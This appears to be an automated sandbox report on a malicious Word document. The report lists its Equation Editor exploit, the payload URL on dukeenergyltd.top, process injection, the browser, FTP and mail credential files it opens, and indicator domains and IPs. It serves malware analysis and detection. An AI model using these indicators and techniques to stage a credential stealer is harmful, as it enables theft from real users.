          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory allocated: 1F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory allocated: 2C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 260Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scr TID: 3236Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scr TID: 3312Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3468Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F608D LdrInitializeThunk,6_2_001F608D
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
          Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
          Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory written: C:\Users\user\AppData\Roaming\mpoom39002.scr base: 80000 value starts with: 4D5AJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrQueries volume information: C:\Users\user\AppData\Roaming\mpoom39002.scr VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrQueries volume information: C:\Users\user\AppData\Roaming\mpoom39002.scr VolumeInformationJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR
          Source: Yara matchFile source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
          Source: Yara matchFile source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR
          Source: Yara matchFile source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          11
          Disable or Modify Tools
          2
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services11
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts33
          Exploitation for Client Execution
          Boot or Logon Initialization Scripts111
          Process Injection
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory13
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Obfuscated Files or Information
          Security Account Manager1
          Process Discovery
          SMB/Windows Admin Shares1
          Email Collection
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Install Root Certificate
          NTDS31
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Software Packing
          LSA Secrets1
          Remote System Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp
          Cached Domain Credentials1
          System Network Configuration Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
          Masquerading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Modify Registry
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
          Virtualization/Sandbox Evasion
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
          Process Injection
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1430108 Sample: ATTHACHED SCAN-P.O SPECIFIC... Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 38 Multi AV Scanner detection for domain / URL 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 13 other signatures 2->44 8 WINWORD.EXE 336 14 2->8         started        process3 process4 10 EQNEDT32.EXE 11 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 32 dukeenergyltd.top 172.67.134.136, 443, 49161 CLOUDFLARENETUS United States 10->32 24 C:\Users\user\AppData\...\mpoom39002.scr, PE32 10->24 dropped 26 C:\Users\user\AppData\Local\...\mpoom[1].scr, PE32 10->26 dropped 52 Installs new ROOT certificates 10->52 54 Office equation editor establishes network connection 10->54 56 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->56 17 mpoom39002.scr 2 10->17         started        file6 signatures7 process8 signatures9 34 Machine Learning detection for dropped file 17->34 36 Injects a PE file into a foreign processes 17->36 20 mpoom39002.scr 12 2 17->20         started        process10 dnsIp11 28 checkip.dyndns.org 20->28 30 checkip.dyndns.com 193.122.6.168, 49162, 80 ORACLE-BMC-31898US United States 20->30 46 Tries to steal Mail credentials (via file / registry access) 20->46 48 Tries to harvest and steal ftp login credentials 20->48 50 Tries to harvest and steal browser information (history, passwords, etc) 20->50 signatures12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc42%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\mpoom39002.scr100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLink
          dukeenergyltd.top26%VirustotalBrowse
          checkip.dyndns.com0%VirustotalBrowse
          checkip.dyndns.org0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
          http://checkip.dyndns.org/0%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          http://checkip.dyndns.org/q0%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://checkip.dyndns.org0%URL Reputationsafe
          http://checkip.dyndns.com0%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          https://dukeenergyltd.top/25%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          dukeenergyltd.top
          172.67.134.136
          truetrueunknown
          checkip.dyndns.com
          193.122.6.168
          truefalseunknown
          checkip.dyndns.org
          unknown
          unknowntrueunknown
          NameMaliciousAntivirus DetectionReputation
          http://checkip.dyndns.org/false
          • URL Reputation: safe
          unknown
          https://dukeenergyltd.top/mpoom.scrtrue
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://dukeenergyltd.top/mpoom.scrjEQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://api.telegram.org/botmpoom39002.scr, 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmpfalse
                  high
                  https://dukeenergyltd.top/EQNEDT32.EXE, 00000002.00000002.344727148.000000000035D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://dukeenergyltd.top/mpoom.scrjjC:EQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://checkip.dyndns.org/qmpoom39002.scr, 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://dukeenergyltd.top/mpoom.scrsoC:EQNEDT32.EXE, 00000002.00000002.344727148.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://checkip.dyndns.orgmpoom39002.scr, 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610871385.0000000002609000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.userEQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://checkip.dyndns.commpoom39002.scr, 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namempoom39002.scr, 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              193.122.6.168
                              checkip.dyndns.comUnited States
                              31898ORACLE-BMC-31898USfalse
                              172.67.134.136
                              dukeenergyltd.topUnited States
                              13335CLOUDFLARENETUStrue
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1430108
                              Start date and time:2024-04-23 07:49:08 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 23s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winDOC@7/10@3/2
                              EGA Information:
                              • Successful, ratio: 66.7%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 94
                              • Number of non-executed functions: 11
                              Cookbook Comments:
                              • Found application associated with file extension: .doc
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Active ActiveX Object
                              • Scroll down
                              • Close Viewer
                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                              • Execution Graph export aborted for target EQNEDT32.EXE, PID 2160 because there are no executed function
                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              TimeTypeDescription
                              07:49:54API Interceptor267x Sleep call for process: EQNEDT32.EXE modified
                              07:49:57API Interceptor4748x Sleep call for process: mpoom39002.scr modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              193.122.6.1680FvHGK2cyk.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                              • checkip.dyndns.org/
                              UbMsBrTi5s.exeGet hashmaliciousUnknownBrowse
                              • checkip.dyndns.org/
                              gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                              • checkip.dyndns.org/
                              Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                              • checkip.dyndns.org/
                              109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                              • checkip.dyndns.org/
                              1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                              • checkip.dyndns.org/
                              PT98765445670009.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                              • checkip.dyndns.org/
                              SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                              • checkip.dyndns.org/
                              sipari#U015f formu_831512.exeGet hashmaliciousSnake KeyloggerBrowse
                              • checkip.dyndns.org/
                              PROFORMA FATURA.exeGet hashmaliciousSnake KeyloggerBrowse
                              • checkip.dyndns.org/
                              172.67.134.13603224.docGet hashmaliciousAgentTeslaBrowse
                                Payment_Advice.docGet hashmaliciousUnknownBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  dukeenergyltd.topNEW ORDER.docGet hashmaliciousHTMLPhisherBrowse
                                  • 104.21.25.202
                                  MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                  • 104.21.25.202
                                  RFQ.docGet hashmaliciousUnknownBrowse
                                  • 104.21.25.202
                                  03224.docGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.134.136
                                  PO881620-2024.docGet hashmaliciousRemcosBrowse
                                  • 104.21.25.202
                                  PROFORMA INVOICE.docGet hashmaliciousUnknownBrowse
                                  • 104.21.25.202
                                  SecuriteInfo.com.Exploit.CVE-2018-0798.4.13423.15596.rtfGet hashmaliciousUnknownBrowse
                                  • 104.21.25.202
                                  SecuriteInfo.com.Exploit.CVE-2018-0798.4.12949.24049.rtfGet hashmaliciousUnknownBrowse
                                  • 104.21.25.202
                                  Payment_Advice.docGet hashmaliciousUnknownBrowse
                                  • 172.67.134.136
                                  checkip.dyndns.comorder.exeGet hashmaliciousUnknownBrowse
                                  • 158.101.44.242
                                  0FvHGK2cyk.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                  • 193.122.6.168
                                  M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                  • 132.226.247.73
                                  rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.247.73
                                  sample1.exeGet hashmaliciousSeclesBot, TrojanRansomBrowse
                                  • 132.226.247.73
                                  UbMsBrTi5s.exeGet hashmaliciousUnknownBrowse
                                  • 193.122.6.168
                                  Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  • 158.101.44.242
                                  BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 132.226.247.73
                                  gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 193.122.6.168
                                  edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 193.122.130.0
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ORACLE-BMC-31898USpGTQLD9ukH.elfGet hashmaliciousMiraiBrowse
                                  • 193.122.239.120
                                  pJNcZyhUh8.elfGet hashmaliciousMiraiBrowse
                                  • 193.122.239.110
                                  g2PqnVy6cQ.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 144.25.156.10
                                  b3astmode.x86.elfGet hashmaliciousUnknownBrowse
                                  • 168.138.235.164
                                  order.exeGet hashmaliciousUnknownBrowse
                                  • 158.101.44.242
                                  KSRRrEMt1w.elfGet hashmaliciousMiraiBrowse
                                  • 147.154.227.149
                                  4QuhksnsA6.elfGet hashmaliciousUnknownBrowse
                                  • 130.61.64.122
                                  https://app.esign.docusign.com/e/er?utm_campaign=GBL_XX_DBU_NEW_2307_FreetoTrialUnlock_Email1AU&utm_medium=email&utm_source=Eloqua&elqCampaignId=29542&s=566810826&lid=32871&elqTrackId=1034fb987fd44c9a9a4d0833ff06a55d&elq=89d72859fe264966a0176d4309dbb1a6&elqaid=60251&elqat=1Get hashmaliciousUnknownBrowse
                                  • 192.29.14.118
                                  u2.batGet hashmaliciousBazar Loader, QbotBrowse
                                  • 138.1.33.162
                                  0FvHGK2cyk.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                  • 193.122.6.168
                                  CLOUDFLARENETUShttps://universewild.orgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                  • 104.17.2.184
                                  https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpUGet hashmaliciousHTMLPhisherBrowse
                                  • 104.17.2.184
                                  http://myidealwedding.com.auGet hashmaliciousBitRAT, HTMLPhisherBrowse
                                  • 104.17.25.14
                                  QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  https://netorg64799-my.sharepoint.com/:b:/g/personal/alva_wct-usa_com/ES73RZgSrIxGsn3-WRolkh4BarUkUa8B7jWUjl7sJYhzog?e=uQClH3Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                  • 104.17.2.184
                                  szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                  • 104.17.24.14
                                  https://pub-187b2d91c0494f3ba5ec3b326cc8fed8.r2.dev/baeleavemail.htmlGet hashmaliciousHTMLPhisherBrowse
                                  • 104.18.2.35
                                  szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                  • 104.17.25.14
                                  https://getpornoliwbstfenx.z13.web.core.windows.net/index.htmlGet hashmaliciousTechSupportScamBrowse
                                  • 104.18.11.207
                                  hfGA6tjyxY.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  • 104.21.18.240
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  7dcce5b76c8b17472d024758970a406bszamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                  • 172.67.134.136
                                  New Quotation.docGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.134.136
                                  bZA95up38s.rtfGet hashmaliciousAgentTeslaBrowse
